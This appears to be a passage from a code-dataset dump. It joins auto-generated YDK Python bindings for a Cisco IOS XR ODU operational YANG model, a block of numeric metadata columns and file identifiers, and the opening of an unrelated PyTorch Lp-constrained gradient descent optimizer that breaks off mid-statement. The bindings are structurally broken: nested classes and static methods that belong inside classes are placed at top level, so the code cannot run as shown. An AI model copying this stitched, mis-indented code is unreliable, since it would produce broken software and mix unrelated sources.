        class PassiveMatch(_Entity_):
            """
            Passive Match
            .. attribute:: src_tid
            Src TId
            **type**\: int
            **range:** 0..65535
            **config**\: False
            .. attribute:: src_rid
            Src RId
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            """

            _prefix = 'controller-odu-oper'
            _revision = '2015-11-09'

            def __init__(self):
                if sys.version_info > (3,):
                    super().__init__()
                else:
                    super(Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.PassiveMatch, self).__init__()
                self.yang_name = "passive-match"
                self.yang_parent_name = "te-tunnel-info"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])  # leaf-only container
                self._leafs = OrderedDict([
                    ('src_tid', (YLeaf(YType.uint16, 'src-tid'), ['int'])),
                    ('src_rid', (YLeaf(YType.uint32, 'src-rid'), ['int'])),
                ])
                self.src_tid = None
                self.src_rid = None
                self._segment_path = lambda: "passive-match"
                # Must remain the last statement (see note on the outer class).
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.PassiveMatch, ['src_tid', 'src_rid'], name, value)

            @staticmethod
            def _meta_info():
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
                return meta._meta_table['Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.PassiveMatch']['meta_info']

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
            return meta._meta_table['Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo']['meta_info']

    @staticmethod
    def _meta_info():
        # Meta information is kept in a generated side table, imported lazily.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.XcRemCtxData']['meta_info']
class OduDelay(_Entity_):
    """
    ODU Delay
    .. attribute:: mode
    Latency Mode
    **type**\: int
    **range:** 0..255
    **config**\: False
    .. attribute:: delay
    Delay Value
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    """

    # YANG module identity for this schema node.
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3-compatible super() call (this generated module supports both).
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.OduDelay, self).__init__()
        # Schema bookkeeping: YANG names and position of this node in the tree.
        self.yang_name = "odu-delay"
        self.yang_parent_name = "info"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container: no child classes
        # Maps python attribute name -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('mode', (YLeaf(YType.uint8, 'mode'), ['int'])),
            ('delay', (YLeaf(YType.uint32, 'delay'), ['int'])),
        ])
        # Leaf values start unset; assignments go through __setattr__ below.
        self.mode = None
        self.delay = None
        self._segment_path = lambda: "odu-delay"
        # NOTE(review): freezing appears to be required as the LAST statement of
        # __init__ -- _perform_setattr (in _Entity_, outside this file) presumably
        # gates attribute writes on _is_frozen; confirm against _Entity_.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all attribute writes through the base-class validator, which
        # restricts them to the declared leaf names.
        self._perform_setattr(Odu.Controllers.Controller.Info.OduDelay, ['mode', 'delay'], name, value)

    @staticmethod
    def _meta_info():
        # Meta information is kept in a generated side table, imported lazily.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.OduDelay']['meta_info']
class OduTerminateEther(_Entity_):
    """
    odu terminate ether
    .. attribute:: vether_ifhandle
    interface handle
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: ethernet_mapping
    ethernet mapping
    **type**\: :py:class:`OduEtherMapPingEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduEtherMapPingEt>`
    **config**\: False
    .. attribute:: ethernet_interface
    Ethernet interface name
    **type**\: str
    **config**\: False
    """

    # YANG module identity for this schema node.
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3-compatible super() call (this generated module supports both).
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.OduTerminateEther, self).__init__()
        # Schema bookkeeping: YANG names and position of this node in the tree.
        self.yang_name = "odu-terminate-ether"
        self.yang_parent_name = "info"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container: no child classes
        # Maps python attribute name -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('vether_ifhandle', (YLeaf(YType.uint32, 'vether-ifhandle'), ['int'])),
            ('ethernet_mapping', (YLeaf(YType.enumeration, 'ethernet-mapping'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduEtherMapPingEt', '')])),
            ('ethernet_interface', (YLeaf(YType.str, 'ethernet-interface'), ['str'])),
        ])
        # Leaf values start unset; assignments go through __setattr__ below.
        self.vether_ifhandle = None
        self.ethernet_mapping = None
        self.ethernet_interface = None
        self._segment_path = lambda: "odu-terminate-ether"
        # NOTE(review): freezing appears to be required as the LAST statement of
        # __init__ -- _perform_setattr (in _Entity_, outside this file) presumably
        # gates attribute writes on _is_frozen; confirm against _Entity_.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all attribute writes through the base-class validator, which
        # restricts them to the declared leaf names.
        self._perform_setattr(Odu.Controllers.Controller.Info.OduTerminateEther, ['vether_ifhandle', 'ethernet_mapping', 'ethernet_interface'], name, value)

    @staticmethod
    def _meta_info():
        # Meta information is kept in a generated side table, imported lazily.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.OduTerminateEther']['meta_info']
class AinsInfo(_Entity_):
    """
    AINS information

    .. attribute:: ains_state

        AINS State
        **type**\: :py:class:`OduAinsStateEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduAinsStateEt>`
        **config**\: False

    .. attribute:: ains_timer_minutes

        AINS Timer in Minutes
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        **units**\: minute

    .. attribute:: ains_remaining_secs

        AINS Remaining Seconds
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        **units**\: second
    """

    # YANG module prefix and revision this entity was generated from.
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible call to the _Entity_ base initializer.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.AinsInfo, self).__init__()

        self.yang_name = "ains-info"
        self.yang_parent_name = "info"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # No child containers under this node.
        self._child_classes = OrderedDict([])
        # Leaf descriptors: python attribute -> (YLeaf, accepted python types).
        self._leafs = OrderedDict([
            ('ains_state', (YLeaf(YType.enumeration, 'ains-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduAinsStateEt', '')])),
            ('ains_timer_minutes', (YLeaf(YType.uint32, 'ains-timer-minutes'), ['int'])),
            ('ains_remaining_secs', (YLeaf(YType.uint32, 'ains-remaining-secs'), ['int'])),
        ])
        self.ains_state = None
        self.ains_timer_minutes = None
        self.ains_remaining_secs = None
        self._segment_path = lambda: "ains-info"
        # Mark construction finished; later attribute writes are routed
        # through _perform_setattr (see __setattr__ below).
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.AinsInfo, ['ains_state', 'ains_timer_minutes', 'ains_remaining_secs'], name, value)

    @staticmethod
    def _meta_info():
        # Look up this entity's description in the generated meta table.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.AinsInfo']['meta_info']
class Odu_(_Entity_):
    """
    Child Ts

    .. attribute:: intf_name

        Child Interface Name
        **type**\: str
        **length:** 0..64
        **config**\: False

    .. attribute:: tpn_value

        Tpn Bitmap
        **type**\: int
        **range:** 0..255
        **config**\: False

    .. attribute:: ts_bitmap

        Ts Bitmap
        **type**\: str
        **length:** 0..256
        **config**\: False
    """

    # YANG module prefix and revision this entity was generated from.
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible call to the _Entity_ base initializer.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Odu_, self).__init__()

        self.yang_name = "odu"
        self.yang_parent_name = "info"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # No child containers under this node.
        self._child_classes = OrderedDict([])
        # Leaf descriptors: python attribute -> (YLeaf, accepted python types).
        self._leafs = OrderedDict([
            ('intf_name', (YLeaf(YType.str, 'intf-name'), ['str'])),
            ('tpn_value', (YLeaf(YType.uint8, 'tpn-value'), ['int'])),
            ('ts_bitmap', (YLeaf(YType.str, 'ts-bitmap'), ['str'])),
        ])
        self.intf_name = None
        self.tpn_value = None
        self.ts_bitmap = None
        self._segment_path = lambda: "odu"
        # Mark construction finished; later attribute writes are routed
        # through _perform_setattr (see __setattr__ below).
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Odu_, ['intf_name', 'tpn_value', 'ts_bitmap'], name, value)

    @staticmethod
    def _meta_info():
        # Look up this entity's description in the generated meta table.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Odu_']['meta_info']
class Odutcm(_Entity_):
    """
    ODU TCM

    .. attribute:: tcmtti_mode

        TTI
        **type**\: :py:class:`TcmttiMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Odutcm.TcmttiMode>`
        **config**\: False

    .. attribute:: tcmsf

        ODU TCM SF in the form of 1.0E \- <SF>
        **type**\: int
        **range:** 0..255
        **config**\: False

    .. attribute:: tcmsd

        ODU TCM SD in the form of 1.0E \- <SD>
        **type**\: int
        **range:** 0..255
        **config**\: False

    .. attribute:: tcm_state

        ODU TCM state
        **type**\: :py:class:`OduTcmStateEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTcmStateEt>`
        **config**\: False

    .. attribute:: tcmper_mon

        Performance Monitoring
        **type**\: :py:class:`OduTcmPerMon <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTcmPerMon>`
        **config**\: False

    .. attribute:: tcm_mode

        ODU TCM Mode
        **type**\: :py:class:`OduTcmMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTcmMode>`
        **config**\: False

    .. attribute:: actual_tcm_mode

        TCM Mode in H/W
        **type**\: :py:class:`OduTcmMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTcmMode>`
        **config**\: False

    .. attribute:: tcmltc_state

        ODU TCM LTC CA state
        **type**\: :py:class:`OduTcmStateEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTcmStateEt>`
        **config**\: False

    .. attribute:: tcmtim_state

        ODU TCM TIM CA state
        **type**\: :py:class:`OduTcmStateEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTcmStateEt>`
        **config**\: False

    .. attribute:: tcm_delay

        ODU TCM DELAY
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
    """

    # YANG module prefix and revision this entity was generated from.
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible call to the _Entity_ base initializer.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Odutcm, self).__init__()

        self.yang_name = "odutcm"
        self.yang_parent_name = "info"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child container: YANG name -> (python attribute, class).
        self._child_classes = OrderedDict([("tcmtti-mode", ("tcmtti_mode", Odu.Controllers.Controller.Info.Odutcm.TcmttiMode))])
        # Leaf descriptors: python attribute -> (YLeaf, accepted python types).
        self._leafs = OrderedDict([
            ('tcmsf', (YLeaf(YType.uint8, 'tcmsf'), ['int'])),
            ('tcmsd', (YLeaf(YType.uint8, 'tcmsd'), ['int'])),
            ('tcm_state', (YLeaf(YType.enumeration, 'tcm-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTcmStateEt', '')])),
            ('tcmper_mon', (YLeaf(YType.enumeration, 'tcmper-mon'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTcmPerMon', '')])),
            ('tcm_mode', (YLeaf(YType.enumeration, 'tcm-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTcmMode', '')])),
            ('actual_tcm_mode', (YLeaf(YType.enumeration, 'actual-tcm-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTcmMode', '')])),
            ('tcmltc_state', (YLeaf(YType.enumeration, 'tcmltc-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTcmStateEt', '')])),
            ('tcmtim_state', (YLeaf(YType.enumeration, 'tcmtim-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTcmStateEt', '')])),
            ('tcm_delay', (YLeaf(YType.uint32, 'tcm-delay'), ['int'])),
        ])
        self.tcmsf = None
        self.tcmsd = None
        self.tcm_state = None
        self.tcmper_mon = None
        self.tcm_mode = None
        self.actual_tcm_mode = None
        self.tcmltc_state = None
        self.tcmtim_state = None
        self.tcm_delay = None
        # Instantiate the child container and wire it to this parent.
        self.tcmtti_mode = Odu.Controllers.Controller.Info.Odutcm.TcmttiMode()
        self.tcmtti_mode.parent = self
        self._children_name_map["tcmtti_mode"] = "tcmtti-mode"
        self._segment_path = lambda: "odutcm"
        # Mark construction finished; later attribute writes are routed
        # through _perform_setattr (see __setattr__ below).
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Odutcm, ['tcmsf', 'tcmsd', 'tcm_state', 'tcmper_mon', 'tcm_mode', 'actual_tcm_mode', 'tcmltc_state', 'tcmtim_state', 'tcm_delay'], name, value)

    class TcmttiMode(_Entity_):
        """
        TTI

        .. attribute:: tx

            String Sent
            **type**\: :py:class:`Tx <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Tx>`
            **config**\: False

        .. attribute:: exp

            String Expected
            **type**\: :py:class:`Exp <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Exp>`
            **config**\: False

        .. attribute:: rec

            String Received
            **type**\: :py:class:`Rec <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Rec>`
            **config**\: False

        .. attribute:: g709tti_sent_mode

            G709TTI Sent
            **type**\: :py:class:`OduTtiEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTtiEt>`
            **config**\: False

        .. attribute:: g709tti_exp_mode

            G709TTI Expected
            **type**\: :py:class:`OduTtiEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTtiEt>`
            **config**\: False

        .. attribute:: g709tti_rec_mode

            G709TTI Received
            **type**\: :py:class:`OduTtiEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTtiEt>`
            **config**\: False
        """

        # YANG module prefix and revision this entity was generated from.
        _prefix = 'controller-odu-oper'
        _revision = '2015-11-09'

        def __init__(self):
            # Python 2/3 compatible call to the _Entity_ base initializer.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode, self).__init__()

            self.yang_name = "tcmtti-mode"
            self.yang_parent_name = "odutcm"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Child containers: YANG name -> (python attribute, class).
            self._child_classes = OrderedDict([("tx", ("tx", Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Tx)), ("exp", ("exp", Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Exp)), ("rec", ("rec", Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Rec))])
            # Leaf descriptors: python attribute -> (YLeaf, accepted python types).
            self._leafs = OrderedDict([
                ('g709tti_sent_mode', (YLeaf(YType.enumeration, 'g709tti-sent-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTtiEt', '')])),
                ('g709tti_exp_mode', (YLeaf(YType.enumeration, 'g709tti-exp-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTtiEt', '')])),
                ('g709tti_rec_mode', (YLeaf(YType.enumeration, 'g709tti-rec-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTtiEt', '')])),
            ])
            self.g709tti_sent_mode = None
            self.g709tti_exp_mode = None
            self.g709tti_rec_mode = None
            # Instantiate child containers and wire them to this parent.
            self.tx = Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Tx()
            self.tx.parent = self
            self._children_name_map["tx"] = "tx"
            self.exp = Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Exp()
            self.exp.parent = self
            self._children_name_map["exp"] = "exp"
            self.rec = Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Rec()
            self.rec.parent = self
            self._children_name_map["rec"] = "rec"
            self._segment_path = lambda: "tcmtti-mode"
            # Mark construction finished; later attribute writes are routed
            # through _perform_setattr (see __setattr__ below).
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode, ['g709tti_sent_mode', 'g709tti_exp_mode', 'g709tti_rec_mode'], name, value)

        class Tx(_Entity_):
            """
            String Sent

            .. attribute:: sapi

                tx String
                **type**\: list of int
                **range:** 0..255
                **config**\: False

            .. attribute:: dapi

                exp String
                **type**\: list of int
                **range:** 0..255
                **config**\: False

            .. attribute:: operator_specific

                rec String
                **type**\: list of int
                **range:** 0..255
                **config**\: False
            """

            # YANG module prefix and revision this entity was generated from.
            _prefix = 'controller-odu-oper'
            _revision = '2015-11-09'

            def __init__(self):
                # Python 2/3 compatible call to the _Entity_ base initializer.
                if sys.version_info > (3,):
                    super().__init__()
                else:
                    super(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Tx, self).__init__()

                self.yang_name = "tx"
                self.yang_parent_name = "tcmtti-mode"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                # Leaf-list descriptors: each attribute is a list of uint8 values.
                self._leafs = OrderedDict([
                    ('sapi', (YLeafList(YType.uint8, 'sapi'), ['int'])),
                    ('dapi', (YLeafList(YType.uint8, 'dapi'), ['int'])),
                    ('operator_specific', (YLeafList(YType.uint8, 'operator-specific'), ['int'])),
                ])
                self.sapi = []
                self.dapi = []
                self.operator_specific = []
                self._segment_path = lambda: "tx"
                # Mark construction finished; later attribute writes are routed
                # through _perform_setattr (see __setattr__ below).
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Tx, ['sapi', 'dapi', 'operator_specific'], name, value)

            @staticmethod
            def _meta_info():
                # Look up this entity's description in the generated meta table.
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
                return meta._meta_table['Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Tx']['meta_info']

        class Exp(_Entity_):
            """
            String Expected

            .. attribute:: sapi

                tx String
                **type**\: list of int
                **range:** 0..255
                **config**\: False

            .. attribute:: dapi

                exp String
                **type**\: list of int
                **range:** 0..255
                **config**\: False

            .. attribute:: operator_specific

                rec String
                **type**\: list of int
                **range:** 0..255
                **config**\: False
            """

            # YANG module prefix and revision this entity was generated from.
            _prefix = 'controller-odu-oper'
            _revision = '2015-11-09'

            def __init__(self):
                # Python 2/3 compatible call to the _Entity_ base initializer.
                if sys.version_info > (3,):
                    super().__init__()
                else:
                    super(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Exp, self).__init__()

                self.yang_name = "exp"
                self.yang_parent_name = "tcmtti-mode"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                # Leaf-list descriptors: each attribute is a list of uint8 values.
                self._leafs = OrderedDict([
                    ('sapi', (YLeafList(YType.uint8, 'sapi'), ['int'])),
                    ('dapi', (YLeafList(YType.uint8, 'dapi'), ['int'])),
                    ('operator_specific', (YLeafList(YType.uint8, 'operator-specific'), ['int'])),
                ])
                self.sapi = []
                self.dapi = []
                self.operator_specific = []
                self._segment_path = lambda: "exp"
                # Mark construction finished; later attribute writes are routed
                # through _perform_setattr (see __setattr__ below).
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Exp, ['sapi', 'dapi', 'operator_specific'], name, value)

            @staticmethod
            def _meta_info():
                # Look up this entity's description in the generated meta table.
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
                return meta._meta_table['Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Exp']['meta_info']

        class Rec(_Entity_):
            """
            String Received

            .. attribute:: sapi

                tx String
                **type**\: list of int
                **range:** 0..255
                **config**\: False

            .. attribute:: dapi

                exp String
                **type**\: list of int
                **range:** 0..255
                **config**\: False

            .. attribute:: operator_specific

                rec String
                **type**\: list of int
                **range:** 0..255
                **config**\: False
            """

            # YANG module prefix and revision this entity was generated from.
            _prefix = 'controller-odu-oper'
            _revision = '2015-11-09'

            def __init__(self):
                # Python 2/3 compatible call to the _Entity_ base initializer.
                if sys.version_info > (3,):
                    super().__init__()
                else:
                    super(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Rec, self).__init__()

                self.yang_name = "rec"
                self.yang_parent_name = "tcmtti-mode"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                # Leaf-list descriptors: each attribute is a list of uint8 values.
                self._leafs = OrderedDict([
                    ('sapi', (YLeafList(YType.uint8, 'sapi'), ['int'])),
                    ('dapi', (YLeafList(YType.uint8, 'dapi'), ['int'])),
                    ('operator_specific', (YLeafList(YType.uint8, 'operator-specific'), ['int'])),
                ])
                self.sapi = []
                self.dapi = []
                self.operator_specific = []
                self._segment_path = lambda: "rec"
                # Mark construction finished; later attribute writes are routed
                # through _perform_setattr (see __setattr__ below).
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Rec, ['sapi', 'dapi', 'operator_specific'], name, value)

            @staticmethod
            def _meta_info():
                # Look up this entity's description in the generated meta table.
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
                return meta._meta_table['Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Rec']['meta_info']

        @staticmethod
        def _meta_info():
            # Look up this entity's description in the generated meta table.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
            return meta._meta_table['Odu.Controllers.Controller.Info.Odutcm.TcmttiMode']['meta_info']

    @staticmethod
    def _meta_info():
        # Look up this entity's description in the generated meta table.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Odutcm']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-table entry describing the Info container."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta_module
    return meta_module._meta_table['Odu.Controllers.Controller.Info']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-table entry describing the Controller list entry."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta_module
    return meta_module._meta_table['Odu.Controllers.Controller']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-table entry describing the Controllers container."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta_module
    return meta_module._meta_table['Odu.Controllers']['meta_info']
def clone_ptr(self):
    """Create a fresh top-level Odu entity, cache it on this instance, and return it."""
    top = Odu()
    self._top_entity = top
    return top
@staticmethod
def _meta_info():
    """Return the generated meta-table entry describing the top-level Odu entity."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta_module
    return meta_module._meta_table['Odu']['meta_info']
| 43.627279
| 5,724
| 0.403089
| 36,019
| 476,279
| 5.025153
| 0.016658
| 0.030409
| 0.038011
| 0.098077
| 0.88173
| 0.864459
| 0.824344
| 0.792846
| 0.749488
| 0.731902
| 0
| 0.022584
| 0.504097
| 476,279
| 10,916
| 5,725
| 43.631275
| 0.743759
| 0.19425
| 0
| 0.699879
| 0
| 0.000241
| 0.131268
| 0.03375
| 0
| 0
| 0
| 0
| 0.055006
| 1
| 0.08661
| false
| 0.007479
| 0.035223
| 0
| 0.22509
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fdb07e1fc3279cf9302796453b1c0ae8dd70b79a
| 48
|
py
|
Python
|
fuel/__init__.py
|
opticrd/fuel-price-extractor-api
|
ce585f3246f4541116b4d1e43a6742d8c285697a
|
[
"MIT"
] | 2
|
2022-02-28T17:23:49.000Z
|
2022-02-28T20:27:25.000Z
|
fuel/__init__.py
|
opticrd/fuel-price-extractor-api
|
ce585f3246f4541116b4d1e43a6742d8c285697a
|
[
"MIT"
] | 2
|
2022-02-22T14:27:44.000Z
|
2022-02-22T21:07:19.000Z
|
fuel/__init__.py
|
opticrd/fuel-price-extractor-api
|
ce585f3246f4541116b4d1e43a6742d8c285697a
|
[
"MIT"
] | null | null | null |
from .main import Prices
from .main import Fuel
| 16
| 24
| 0.791667
| 8
| 48
| 4.75
| 0.625
| 0.421053
| 0.736842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 48
| 2
| 25
| 24
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
fdbe42f8b197c01152cc9309aeb28cc705dccf8b
| 11,989
|
py
|
Python
|
optimizer/lpcgd.py
|
WilliamLiPro/LpSS_demo
|
3f53a2a9c44a3857a8eb95e6fc44b8409ce363f4
|
[
"Apache-2.0"
] | 2
|
2020-10-30T00:47:17.000Z
|
2021-08-21T09:36:02.000Z
|
optimizer/lpcgd.py
|
WilliamLiPro/LpSS
|
9c8cbc17f2662b244f8764508bb2f3b6f077c34f
|
[
"Apache-2.0"
] | null | null | null |
optimizer/lpcgd.py
|
WilliamLiPro/LpSS
|
9c8cbc17f2662b244f8764508bb2f3b6f077c34f
|
[
"Apache-2.0"
] | null | null | null |
import torch
from torch.optim.optimizer import Optimizer, required
import myFunction as myF
class LpCGD(Optimizer):
    r"""Implements Lp constrained gradient descent (optionally with momentum).

    Nesterov momentum is based on the formula from
    `On the importance of initialization and momentum in deep learning`__.

    Args:
        model: module whose parameters are optimized
        net_lp (list): Lp norm of weight for each Lp-constrained layer
        lp_layers (list, optional): name substrings selecting the layers whose
            weights are Lp-normalized (default: ['conv', 'fc'])
        min_input_channel (int, optional): weights whose second dimension is
            smaller than this are excluded from Lp normalization (default: 2)
        forbid_layers (int, optional): number of trailing layers (each counted
            as two parameters, weight + bias) excluded from Lp (default: 1)
        lr (float): learning rate
        lr_decay (float): decay of learning rate (default: 0)
        momentum (float, optional): momentum factor (default: 0)
        dampening (float, optional): dampening for momentum (default: 0)
        weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
        nesterov (bool, optional): enables Nesterov momentum (default: False)
    """

    def __init__(self, model, net_lp, lp_layers: list = None, min_input_channel: int = 2,
                 forbid_layers: int = 1,
                 lr=required, lr_decay: float = 0,
                 momentum: float = 0, dampening: float = 0,
                 weight_decay: float = 0, nesterov=False):
        # FIX: the former default lp_layers=['conv', 'fc'] was a mutable default
        # argument (one list object shared by every instance); use a None sentinel.
        if lp_layers is None:
            lp_layers = ['conv', 'fc']
        # validate hyper-parameters
        if lr is not required and lr < 0.0:
            raise ValueError("Invalid learning rate: {}".format(lr))
        if lr_decay < 0.0:
            raise ValueError("Invalid lr_decay rate: {}".format(lr_decay))
        if momentum < 0.0:
